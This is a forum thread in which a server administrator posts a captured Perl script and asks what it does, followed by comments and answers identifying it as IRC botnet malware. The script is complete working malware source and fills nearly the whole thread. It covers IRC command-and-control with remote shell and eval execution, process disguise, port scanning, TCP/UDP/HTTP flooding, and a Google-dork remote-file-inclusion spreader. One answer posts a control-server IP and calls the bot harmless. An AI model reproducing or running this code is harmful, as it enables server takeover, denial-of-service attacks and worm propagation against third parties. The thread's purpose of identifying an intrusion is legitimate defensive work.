# Caught this hitting our webmail server, any ideas?

Tags: perl

So this was bouncing off our webmail server for the last couple days, I took it home today to look it through. Any ideas as to what is does/is/attempting to do? I have been looking through and would appreciate another set of eyes on it.

```
 #!/usr/bin/perl

 system("kill -9 `ps ax |grep /usr/sbin/apache/asterisks |grep -v grep|awk '{print $1;}'`");

 my $processo = '/usr/sbin/apache/asterisks';


 my @titi = ("index.php?page=","main.php?page=","index.php?p=","index.php?x=","main.php?p=","index.php?inc=","index.php?frame=","main.php?x=","index.php?path=","index.php?include=","main.php?path=","index.php?file=","main.php?x=",
 "default.php?page=",
 "index.php?open=",
 "index.php?pagina=",
 "index.php?pg=",
 "index.php?pag=",
 "index.php?content=",
 "index.php?cont=",
 "index.php?c=",
 "index.php?x=",
 "index.php?cat=",
 "index.php?site=",
 "index.php?con=",
 "index.php?action=",
 "index.php?do=",
 "index2.php?x=",
 "index2.php?content=",
 "template.php?pagina=","index.php?load=");

 my $goni = $titi[rand scalar @titi];

 my $linas_max='2';
 my $sleep='5';
 my @adms=("ssd","mario","root");
 my @hostauth=("localhost");
 my @canais=("#rnd");
 chop (my $nick = `uname`);
 my $ircname ='linux';
 chop (my $realname = `uname -r`);
 $servidor='403.404.mn' unless $servidor;
 my $porta='8080';
 my $VERSAO = '0.5';
 $SIG{'INT'} = 'IGNORE';
 $SIG{'HUP'} = 'IGNORE';
 $SIG{'TERM'} = 'IGNORE';
 $SIG{'CHLD'} = 'IGNORE';
 $SIG{'PS'} = 'IGNORE';
 use IO::Socket;
 use Socket;
 use IO::Select;
 chdir("/");
 $servidor="$ARGV[0]" if $ARGV[0];
 $0="$processo"."\0"x16;;
 my $pid=fork;
 exit if $pid;
 die "Problema com o fork: $!" unless defined($pid);

 our %irc_servers;
 our %DCC;
 my $dcc_sel = new IO::Select->new();

 $sel_cliente = IO::Select->new();
 sub sendraw {
   if ($#_ == '1') {
     my $socket = $_[0];
     print $socket "$_[1]\n";
   } else {
       print $IRC_cur_socket "$_[0]\n";
   }
 }

 sub conectar {
    my $meunick = $_[0];
    my $servidor_con = $_[1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
      $IRC_cur_socket = $IRC_socket;

      $IRC_socket->autoflush(1);
      $sel_cliente->add($IRC_socket);

      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
      nick("$meunick");
      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
      sleep 1;
    }
 }
 my $line_temp;
 while( 1 ) {
    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
      $IRC_cur_socket = $fh;
      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
      $nread = sysread($fh, $msg, 4096);
      if ($nread == 0) {
         $sel_cliente->remove($fh);
         $fh->close;
         delete($irc_servers{$fh});
      }
      @lines = split (/\n/, $msg);

      for(my $c=0; $c<= $#lines; $c++) {
        $line = $lines[$c];
        $line=$line_temp.$line if ($line_temp);
        $line_temp='';
        $line =~ s/\r$//;
        unless ($c == $#lines) {
          parse("$line");
        } else {
            if ($#lines == 0) {
              parse("$line");
            } elsif ($lines[$c] =~ /\r$/) {
                parse("$line");
            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                parse("$line");
            } else {
                $line_temp = $line;
            }
        }
       }
    }
 }

 sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
      sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
        if ($args =~ /^\001VERSION\001$/) {
          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
        }
        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
          if ($onde eq "$meunick"){
            shell("$pn", "$args");
          }
          if ($args =~ /^(\Q$meunick\E|\!a)\s+(.*)/ ) {
             my $natrix = $1;
             my $arg = $2;
             if ($arg =~ /^\!(.*)/) {
               ircase("$pn","$onde","$1") unless ($natrix eq "!root" and $arg =~ /^\!nick/);
             } elsif ($arg =~ /^\@(.*)/) {
                 $ondep = $onde;
                 $ondep = $pn if $onde eq $meunick;
                 bfunc("$ondep","$1");
             } else {
                 shell("$onde", "$arg");
             }
          }
        }
  }
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
        if (lc($1) eq lc($meunick)) {
          $meunick=$4;
          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
        nick("$meunick-".int rand(999999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
        $meunick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        foreach my $canal (@canais) {
          sendraw("JOIN $canal ddosit");
        }
    }
 }


 sub bfunc {
   my $printl = $_[0];
   my $funcarg = $_[1];
   if (my $pid = fork) {
      waitpid($pid, 0);
   } else {
       if (fork) {
          exit;
        } else {
            if ($funcarg =~ /^portscan (.*)/) {
              my $hostip="$1";
              my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
              my (@aberta, %porta_banner);
       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
              foreach my $porta (@portas)  {
                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                 if ($scansock) {
                    push (@aberta, $porta);
                    $scansock->close;
                 }
              }

              if (@aberta) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
              } else {
                sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
              }
            }
            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
       my $itime = time;
       my ($cur_time);
              $cur_time = time - $itime;
       while ($3>$cur_time){
              $cur_time = time - $itime;
       &tcpflooder("$1","$2","$3");
              }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
            }
     if ($funcarg =~ /^version/) {
   sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
   }
            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
       srand;
       my $itime = time;
       my ($cur_time);
       my ($exploited);
       $boturl=$2;
              $cur_time = time - $itime;$exploited = 0;
   while($1>$cur_time){
       $cur_time = time - $itime;
       @urls=fetch();
    foreach $url (@urls) {
    $cur_time = time - $itime;
    my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;

    $url =$path."/$goni$boturl" ;




    $page = http_query($url);
    $exploited = $exploited + 1;
       }
   }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
            }
            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
       my $itime = time;
       my ($cur_time);
              $cur_time = time - $itime;
       while ($2>$cur_time){
              $cur_time = time - $itime;
       my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
       close($socket);
              }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
            }
            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
              $dtime = 1 if $dtime == 0;
              my %bytes;
              $bytes{igmp} = $2 * $pacotes{igmp};
              $bytes{icmp} = $2 * $pacotes{icmp};
              $bytes{o} = $2 * $pacotes{o};
              $bytes{udp} = $2 * $pacotes{udp};
              $bytes{tcp} = $2 * $pacotes{tcp};
              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
            }
            exit;
        }
   }
 }

 sub ircase {
   my ($kem, $printl, $case) = @_;

   if ($case =~ /^join (.*)/) {
      j("$1");
    }

 if ($case =~ /^refresh (.*)/) {
 my $goni = $titi[rand scalar @titi];
  }

    if ($case =~ /^part (.*)/) {
       p("$1");
    }
    if ($case =~ /^rejoin\s+(.*)/) {
       my $chan = $1;
       if ($chan =~ /^(\d+) (.*)/) {
         for (my $ca = 1; $ca <= $1; $ca++ ) {
           p("$2");
           j("$2");
         }
       } else {
           p("$chan");
           j("$chan");
       }
    }
    if ($case =~ /^op/) {
       op("$printl", "$kem") if $case eq "op";
       my $oarg = substr($case, 3);
       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^deop/) {
       deop("$printl", "$kem") if $case eq "deop";
       my $oarg = substr($case, 5);
       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^msg\s+(\S+) (.*)/) {
       msg("$1", "$2");
    }
    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
       for (my $cf = 1; $cf <= $1; $cf++) {
         msg("$2", "$3");
       }
    }
    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
       ctcp("$1", "$2");
    }
    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
       for (my $cf = 1; $cf <= $1; $cf++) {
         ctcp("$2", "$3");
       }
    }
    if ($case =~ /^nick (.*)/) {
       nick("$1");
    }
    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
        conectar("$2", "$1", 6667);
    }
    if ($case =~ /^raw (.*)/) {
       sendraw("$1");
    }
    if ($case =~ /^eval (.*)/) {
      eval "$1";
    }
 }

 sub shell {
   my $printl=$_[0];
   my $comando=$_[1];
   if ($comando =~ /cd (.*)/) {
     chdir("$1") || msg("$printl", "No such file or directory");
     return;
   }
   elsif ($pid = fork) {
      waitpid($pid, 0);
   } else {

       if (fork) {
          exit;
        } else {
            my @resp=`$comando 2>&1 3>&1`;
            my $c=0;
            foreach my $linha (@resp) {
              $c++;
              chop $linha;
              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
              if ($c == "$linas_max") {
                $c=0;
                sleep $sleep;
              }
            }
            exit;
        }
   }
 }

 sub tcpflooder {
  my $itime = time;
  my ($cur_time);
  my ($ia,$pa,$proto,$j,$l,$t);
  $ia=inet_aton($_[0]);
  $pa=sockaddr_in($_[1],$ia);
  $ftime=$_[2];
  $proto=getprotobyname('tcp');
  $j=0;$l=0;
  $cur_time = time - $itime;
  while ($l<1000){
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   $t="SOCK$l";
   socket($t,PF_INET,SOCK_STREAM,$proto);
   connect($t,$pa)||$j--;
   $j++;$l++;
  }
  $l=0;
  while ($l<1000){
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   $t="SOCK$l";
   shutdown($t,2);
   $l++;
  }
 }

 sub udpflooder {
   my $iaddr = inet_aton($_[0]);
   my $msg = 'A' x $_[1];
   my $ftime = $_[2];
   my $cp = 0;
   my (%pacotes);
   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
   return(undef) if $cp == 4;
   my $itime = time;
   my ($cur_time);
   while ( 1 ) {
      for (my $porta = 1; $porta <= 65000; $porta++) {
        $cur_time = time - $itime;
        last if $cur_time >= $ftime;
        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

        for (my $pc = 3; $pc <= 255;$pc++) {
          next if $pc == 6;
          $cur_time = time - $itime;
          last if $cur_time >= $ftime;
          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
        }
      }
      last if $cur_time >= $ftime;
   }
   return($cur_time, %pacotes);
 }

 sub ctcp {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
 }
 sub msg {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :$_[1]");
 }
 sub notice {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
 }
 sub op {
    return unless $#_ == 1;
    sendraw("MODE $_[0] +o $_[1]");
 }
 sub deop {
    return unless $#_ == 1;
    sendraw("MODE $_[0] -o $_[1]");
 }
 sub j { &join(@_); }
 sub join {
    return unless $#_ == 0;
    sendraw("JOIN $_[0]");
 }
 sub p { part(@_); }
 sub part {
   sendraw("PART $_[0]");
 }
 sub nick {
   return unless $#_ == 0;
   sendraw("NICK $_[0]");
 }
 sub quit {
   sendraw("QUIT :$_[0]");
 }

 # Spreader
 # this 'spreader' code isnot mine, i dont know who coded it.
 # update: well, i just fix0red this shit a bit.
 #

 sub fetch(){
     my $rnd=(int(rand(9999)));
     my $n= 80;
     if ($rnd<5000) { $n<<=1;}
     my $s= (int(rand(5)) * $n);

 my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
   "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
   "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
   "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
   "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
   "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
   "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
   "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
   "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
   "vu","vn","ye","yu","cd","zm","zw","");
 my @str;

 foreach $dom  (@dominios)
 {
  push (@str,"allinurl:%22".$dom."/".$goni."%22");
 }

     my $query="www.google.com/search?q=";
     $query.=$str[(rand(scalar(@str)))];
     $query.="&num=$n&start=$s";


     my @lst=();
     my $page = http_query($query);
     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  if ($1 !~ m/google|cache|translate/){
      push (@lst,$1);
  }
     }
     return (@lst);
 }


 sub http_query($){
     my ($url) = @_;
     my $host=$url;
     my $query=$url;

     my $page="";
     $host =~ s/href=\"?http:\/\///;
     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
     $query =~s/$host//;
     if ($query eq "") {$query="/";};
     eval {
  local $SIG{ALRM} = sub { die "1";};
  alarm 10;
  my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  my @r = <$sock>;
  $page="@r";
  alarm 0;
  close($sock);
     };
     return $page;

 }
```

Comment: This should explain everything: http://seclists.org/incidents/2006/May/3

Comment: yep, perl-based IRC-bot; hase some build-in fucntions (portscan, tcp/udp/httpflood, google-dork-scanner, remote-control and probably some spam-sending-functions.

Comment: bot writers could greatly benefit from `Perl::Critic`

Comment: Avast blocked this webpage. Reason being: Infected webpage; `perl:Shellbot-T [Trj]` - It saw this code and noticed it was an infected script

Answer (score 1):

As mentioned in the comments, it seems that someone has been attempting to infect your server with their IRC botnet/worm. Essentially, this would be the flow of the attacker:

1. Locate hosts to attempt a public or 0day exploit on (in this case, a few joomla exploits)
2. Attempt to infect the hosts with their perl based script, which connects your server, to their botnet
3. Control a horde of servers from an IRC channel.

The perl script you mentioned in your question, allows for google dorking (finding more vulnerable hosts to execute exploits on), port scanning, DoS'ing, remote code execution and also some other malicious actions e.g. spamming.

Answer (score -1):

i have the same script on my server.

IRC IP: 77.79.83.154

Its a harmless script kiddie with too much time.

Comment: The question was what that harmless script kiddie is *attempting to do*. Please try to explain what the purpose of that script is and under what circumstances it could cause damage.

Comment: Script kiddies are far from harmless, and the idle are the most dangerous of all.